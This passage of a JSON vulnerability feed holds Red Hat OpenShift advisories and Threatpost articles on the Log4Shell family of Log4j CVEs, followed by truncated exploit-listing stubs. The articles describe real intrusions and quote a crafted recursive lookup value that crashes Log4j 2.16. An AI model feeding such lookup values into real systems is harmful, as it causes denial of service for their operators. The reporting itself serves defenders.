"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-10T12:19:27", "id": "RHSA-2021:5094", "href": "https://access.redhat.com/errata/RHSA-2021:5094", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T16:42:53", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T14:18:30", "type": "redhat", "title": "(RHSA-2021:5108) Critical: OpenShift Container Platform 4.8.z security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-15T12:31:06", "id": "RHSA-2021:5108", "href": "https://access.redhat.com/errata/RHSA-2021:5108", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T20:40:39", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T06:06:42", "type": "redhat", "title": "(RHSA-2021:5106) Critical: OpenShift Container Platform 4.6.z security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T06:07:03", "id": "RHSA-2021:5106", "href": "https://access.redhat.com/errata/RHSA-2021:5106", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-12-15T16:41:35", "description": "As if finding one easily exploited and extremely dangerous flaw in the ubiquitous Java logging library Apache Log4j hadn\u2019t already turned the Internet security community on its ear, researchers now have found a new vulnerability in Apache\u2019s patch issued to mitigate it.\n\nLast Thursday security researchers began warning that a vulnerability tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) in Apache Log4j was [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) and had the potential, according to many reports, to break the internet. Dubbed Log4Shell by [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>), the flaw resides in the broadly deployed Java logging library and is a remote code execution (RCE) bug that\u2019s simple to exploit in many services and products.\n\nA barrage of attackers immediately set upon Log4Shell, initially to unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages. Then attackers began to branch out, [spawning](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) 60 or more bigger mutations of the original exploit in one day.\n\nTo its credit, Apache hastily released a patch to fix Log4Shell with Log4j [version 2.15.0](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0>) last Friday. 
But now researchers have found that this fix \u201cis incomplete in certain non-default configurations\u201d and paves the way for denial of service (DoS) attacks in certain scenarios, according to [a security advisory](<https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f>) by Apache.org.\n\nThe newly discovered flaw, tracked as [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), could allow attackers with control over Thread Context Map (MDC) input data to craft malicious input data using a Java Naming and Directory Interface (JNDI) Lookup pattern in certain instances, resulting in a DoS attack, according to the advisory.\n\nThe set-up for exploit is when the logging configuration uses a non-default Pattern Layout with either a Context Lookup \u2013 for example, $${ctx:loginId} \u2013 or a Thread Context Map pattern (%X, %mdc, or %MDC), according to the advisory.\n\n\u201cLog4j 2.15.0 restricts JNDI LDAP lookups to localhost by default,\u201d according to Apache.org. \u201cNote that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability.\u201d\n\n## **Fixing the Fix**\n\nA new release of Log4j, version 2.16.0, fixes the issue by removing support for message lookup patterns and disabling JNDI functionality by default, according to the advisory. To mitigate the bug in previous Log4j releases, developers can remove the JndiLookup class from the classpath, Apache.org advised.\n\nOne security professional noted that it may have been Apache\u2019s haste to release a patch for Log4Shell after the initial panic over its discovery may have inadvertently caused the latest CVE.\n\n\u201cOften rushing patches to fix vulnerabilities means that the fix may not be complete, as the case is here,\u201d observed John Bambenek, principal threat hunter at Netenrich, in an email to Threatpost on Tuesday. 
He said the solution to the problem is \u201cto disable JNDI functionality entirely.\u201d\n\nSince at least a dozen groups are already known to be exploiting these vulnerabilities, he urged immediate action be taken to either patch, remove JNDI from Log4j or take it out of the classpath \u2013 \u201cpreferably all of the above,\u201d Bambenek said.\n\n## **Getting a Handle on the Situation**\n\nResearchers and security professionals are still wrapping their heads around the broad and wide-reaching implications of Log4Shell as well as the potential that remains for even more related bugs to be found, another security professional noted.\n\n\u201cWhen a vulnerability is discovered and makes as much noise as Log4Shell, it invariably signals that there are additional vulnerabilities in the same software or fixes for that software and triggers additional research and discovery,\u201d Casey Ellis, founder and CTO at [Bugcrowd](<https://bugcrowd.com/>), wrote in an email to Threatpost.\n\nIndeed, there already is some confusion about how many vulnerabilities currently exist that are related to Log4Shell and how they all correlate to one another, adding to the avalanche of information being published about the bug, researchers from RiskBased Security wrote in a [blog post](<https://www.riskbasedsecurity.com/2021/12/14/log4shell-log4j-vulnerability-attack-surface-variant-and-remediation/>) published Tuesday.\n\nAt this point, there are currently three published CVEs associated with Log4Shell \u2013 CVE-2021-44228, the original zero-day; CVE-2021-45046, the \u201cincomplete fix\u201d; and [CVE-2021-4104](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>), a flaw found in another component of Log4j, JMSAppender, that doesn\u2019t appear to be of great concern, according to the RiskBased Security team.\n\nIn the case of CVE-2021-44228, researchers argue that it is not a new problem at all, \u201cbut is really the same vulnerability,\u201d according to the 
post.\n\n\u201cMITRE and CVE Numbering Authorities (CNA) will assign a second CVE ID in cases of fixes not fully patching an issue,\u201d researchers wrote. \u201cThis helps some organizations in tracking an issue while introducing confusion to others.\u201d\n\nAnd despite there being more than one CVE, \u201cplaces have been treating them as a single issue, but this is definitely not the case,\u201d according to RiskBased Security.\n\n## **Worse Before It Gets Better**\n\nOne thing that\u2019s certain about the mounting drama surrounding Log4Shell is that, because the attack surface for the vulnerability is so vast, there is great potential for extensive and further exploitation, according to RiskBased Security.\n\n\u201cIt is important to call out that Log4j is a popular logging framework in Java,\u201d researchers wrote in the post. \u201cThis means it\u2019s used in an _extraordinary _number of things.\u201d\n\nIndeed, a long list of vendors\u2019 products are vulnerable to Log4Shell, including but not limited to: Broadcom, Cisco, Elasticsearch, F-secure, Fedora, HP, IBM, Microsoft, National Security Agency (NSA), RedHat, SonicWall and VMWare.\n\nWithin hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) malware, the [new Khonsari ransomware](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>), the Orcus remote access trojan (RAT). 
reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\nWhatever happens going forward, as variations for the original exploit continue to be spawned and attackers continue to swarm, the situation is likely to get worse before it gets better. This means that the dust over Log4Shell probably won\u2019t settle for a very long time.\n\n\u201cThis new Log4j vulnerability will likely haunt us for years to come,\u201d according to RiskBased Security.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T14:04:19", "type": "threatpost", "title": "Apache\u2019s Fix for Log4Shell Can Lead to DoS Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-15T14:04:19", "id": 
"THREATPOST:46837E7270195429E1D891848E911254", "href": "https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T00:54:20", "description": "Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) vulnerability.\n\nResearchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a vulnerable VMware installation during an attack that involved of a large undisclosed academic institution, according to research released Wednesday.\n\nOverWatch quickly notified the organization of the activity so the target could \u201cbegin their incident response protocol,\u201d researchers said.\n\nCrowdStrike, among other security firms, has been monitoring for suspicious activity around a vulnerability tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) and colloquially known as Log4Shell that was found in the Apache Log4j logging library in early December and immediately [set upon](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) by attackers.\n\n## **Ever-Widening Attack Surface**\n\nDue to its ubiquitous use, many common infrastructure products from Microsoft, Apple, Twitter, CloudFlare and others are vulnerable to Log4Shell attacks. 
Recently, VMware also [issued guidance](<https://kb.vmware.com/s/article/87073>) that some components of its Horizon service are vulnerable to Log4j exploits, leading OverWatch to add the VMware Horizon Tomcat web server service to their processes-to-watch list, researchers said.\n\nThe Falcon OverWatch team noticed the Aquatic Panda intrusion when the threat actor performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance, they wrote in the post.\n\n\u201cThe threat actor then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat-actor tooling hosted on remote infrastructure,\u201d researchers wrote.\n\nThe commands were executed on a Windows host under the Apache Tomcat service, researchers said. They triaged the initial activity and immediately sent a critical detection to the victim organization, later sharing additional details directly with their security team, they said.\n\nEventually, researchers assessed that a modified version of the Log4j exploit was likely used during the course of the threat actor\u2019s operations, and that the infrastructure used in the attack is linked to Aquatic Panda, they said.\n\n## **Tracking the Attack**\n\nOverWatch researchers tracked the threat actor\u2019s activity closely during the intrusion to provide continuous updates to academic institution as its security administrators scrambled to mitigate the attack, they said.\n\nAquatic Panda engaged in reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. 
Researchers also observed the group attempt discover and stop a third-party endpoint detection and response (EDR) service, they said.\n\nThe threat actors downloaded additional scripts and then executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. They also retrieved three files with VBS file extensions from remote infrastructure, which they then decoded.\n\n\u201cBased on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking,\u201d researchers wrote.\n\nAquatic Panda eventually made multiple attempts to harvest credentials by dumping the memory of the LSASS process using living-off-the-land binaries rdrleakdiag.exe and cdump.exe, a renamed copy of createdump.exe.\n\n\u201cThe threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories,\u201d researchers wrote.\n\nThe victim organization eventually patched the vulnerable application, which prevented further action from Aquatic Panda on the host and stopped the attack, researchers said.\n\n## **New Year, Same Exploit**\n\nAs 2021 comes to a close, it\u2019s likely Log4Shell and exploits developed so attackers can use it for nefarious activity will carry their disruption into the new year.\n\n\u201cThe discussion globally around Log4j has been intense, putting many organizations on edge,\u201d OverWatch researchers wrote. \u201cNo organization wants to hear about such a potentially destructive vulnerability affecting its networks.\u201d\n\nIndeed, the flaw already has created considerable headache for organizations and security researchers alike since its discovery earlier this month. 
Attackers immediately jumped on Log4Shell, [spawning 60 variants](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) of the original exploit created for the flaw in a 24-hour period when it was first revealed. Though Apache moved quickly to patch it, the fix [also turned problematic](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>), creating a [vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) of its own.\n\nMoreover, Aquatic Panda also is not the first organized cybercrime group to recognize the opportunity to exploit Log4Shell, and likely not be the last. On Dec. 20, the Russia-based Conti ransomware gang\u2014known for its sophistication and ruthlessness\u2013became the first professional crimeware outfit [to adopt and weaponize](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) the Log4Shell vulnerability with the creation of a holistic attack chain.\n\nCrowdStrike urged organizations to remain abreast of the latest mitigations available for Log4Shell and overall Log4j vulnerabilities as the situation evolves.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T16:16:23", "type": "threatpost", "title": "APT \u2018Aquatic Panda\u2019 Targets Universities with Log4Shell Exploit Tools", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-30T16:16:23", "id": "THREATPOST:EE0A71A925297032000651C344890BDD", "href": "https://threatpost.com/aquatic-panda-log4shell-exploit-tools/177312/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-20T16:11:34", "description": "No, you\u2019re not seeing triple: On Friday, Apache released yet another patch \u2013 [version 2.17](<https://logging.apache.org/log4j/2.x/download.html>) \u2013 for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.\n\nTrouble comes in threes, and this is the third one for log4j. The latest bug isn\u2019t a variant of the Log4Shell remote-code execution (RCE) bug that\u2019s plagued IT teams since Dec. 10, coming [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) [worldwide](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) within hours of its public disclosure, spawning [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and leading to the [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch.\n\nIt does have similarities, though: The new bug affects the same component as the Log4Shell bug. 
Both the Log4Shell, tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (criticality rating of CVSS 10.0) and the new bug, tracked as [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/CVE-2021-45105>) (CVSS score: 7.5) abuse attacker-controlled lookups in logged data.\n\nThe difference: The lookups in the new bug, CVE-2021-45105, are Context Map lookups instead of the Java Naming and Directory Interface (JNDI) lookups to an LDAP server that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nContextMapLookup allows applications to store data in the Log4j ThreadContext Map and then retrieve the values in the Log4j configuration: For example, an app would store the current user\u2019s login id in the ThreadContext Map with the key \u201cloginId\u201d.\n\nThe weakness has to do with improper input validation and uncontrolled recursion that can lead to DoS.\n\nAs [explained](<https://www.zerodayinitiative.com/blog/2021/12/17/cve-2021-45105-denial-of-service-via-uncontrolled-recursion-in-log4j-strsubstitutor>) by Guy Lederfein of the Trend Micro Research Team, \u201cthe Apache Log4j API supports variable substitution in lookups. However, a crafted variable can cause the application to crash due to uncontrolled recursive substitutions. An attacker with control over lookup commands (e.g., via the Thread Context Map) can craft a malicious lookup variable, which results in a Denial-of-Service (DoS) attack.\u201d\n\nThe new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16, which Apache shipped last week to remediate the [second flaw](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>) in the trio. 
That second bug was the RCE flaw [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), which, in turn, stemmed from Apache\u2019s [incomplete fix](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) for [CVE-2021-44228](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>), aka the Log4Shell vulnerability.\n\nLederfein continued: \u201cWhen a nested variable is substituted by the StrSubstitutor class, it recursively calls the substitute() class. However, when the nested variable references the variable being replaced, the recursion is called with the same string. This leads to an infinite recursion and a DoS condition on the server. As an example, if the Pattern Layout contains a Context Lookup of ${ctx.apiversion}, and its assigned value is ${${ctx.apiversion}}, the variable will be recursively substituted with itself.\u201d\n\nThe vulnerability has been tested and confirmed on Log4j versions up to and including 2.16, he said.\n\nApache has listed mitigating factors, but ZDI recommends upgrading to the latest version to ensure that the bug is completely addressed.\n\nThe latest bug and Apache\u2019s new round of fixes are just the latest news in the ongoing, ever-shifting log4j situation. As exploits flood in, new vulnerabilities emerge and patches turn out to need patching, huge tech players [such as SAP](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>) have been hurrying to hunt down the logging library and to release product patches.\n\n## CISA Mandates Immediate Patching\n\nOn Thursday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 
23.\n\nThe risk presented by the library\u2019s vulnerabilities is sky-high, as multiple threat actors have jumped on the opportunities to exploit vulnerable systems. As Check Point Research (CPR) [highlighted](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) last week, real-life attacks have included a crypto-mining group that launched attacks in five countries.\n\nLast week, Microsoft reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey, are actively exploiting Log4Shell in targeted attacks. Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus \u2013 aka [Charming Kitten](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>), APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\nCPR said that Charming Kitten had gone after seven Israeli targets as of Wednesday.\n\n## Conti Ransomware Gang Is Among the Attackers\n\nThe Conti ransomware gang is in on it too: AdvIntel researchers said last week that they\u2019re seen Conti operators going after VMware vCenter.\n\n\u201cThe current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4j 2 exploit,\u201d the researchers [said](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) last week. \u201cThe criminals pursued targeting specific vulnerable [Log4j 2 VMware vCenter](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) [servers] for lateral movement directly from the compromised network resulting in vCenter access affecting U.S. 
and European victim networks from the pre-existent Cobalt Strike sessions.\u201d\n\nLast week, a ransomware attack that some suspect may be attributable to the [Conti gang](<https://threatpost.com/conti-ransomware-backups/175114/>) forced a family-run chain of restaurants, hotels and breweries, [McMenamins](<https://www.mcmenamins.com/>), to [shut down some operations.](<https://threatpost.com/conti-gang-ransomware-attack-mcmenamins/177119/>)\n\nThe bugs are also being leveraged by botnets, remote access trojans (RATs), initial access brokers, and a new ransomware strain called Khonsari. As of Monday, CPR said that it\u2019s seen more than 4.3 million attempted exploits, more than 46 percent of which were made by \u201cknown malicious groups.\u201d\n\n## Yet More Sleepless Nights\n\nTrend Micro\u2019s Lederfein noted that the log4j component has had quite a run in the vulnerability spotlight, having received \u201cquite a bit of attention\u201d since the Log4Shell vulnerability was revealed 10 days ago. Expect more of the same, he predicted, as \u201cit would not be a surprise to see further bugs disclosed \u2013 with or without a patch.\u201d\n\nTom Garrubba, CISO with Shared Assessments, concurred: \u201cThis vulnerability has been keeping a lot of security professionals up at night,\u201d he told Threatpost. This Javageddon has even percolated up to the C-suite, he said.\n\n\u201cExecutives and board members are also gaining interest as to how this will affect them as well,\u201d he said via email. \u201cLog4j is used all throughout the Internet and [affects] multiple applications and systems with deep roots.\u201d\n\n\u201cThe best path you can take right now is to stay alert to all patches that are coming out to address this vulnerability and put them into place immediately,\u201d Garrubba advised. 
\u201cSadly, it appears this is going to affect organizations continuously into the future as they identify more items that are affected by this vulnerability.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T16:01:57", "type": "threatpost", "title": "Third Log4J Bug Can Trigger DoS; Apache Issues Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T16:01:57", "id": "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "href": "https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-21T09:29:03", "description": "<!-- ABOUT THE PROJECT -->\n## About The Project\n\n\nThis is a spec...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T05:13:25", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-21T08:34:57", "id": "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T23:09:12", "description": "# CVE-2021-44228\nIl 9 dicembre 2021 il mondo \u00e8 venuto a conoscen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:36:16", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
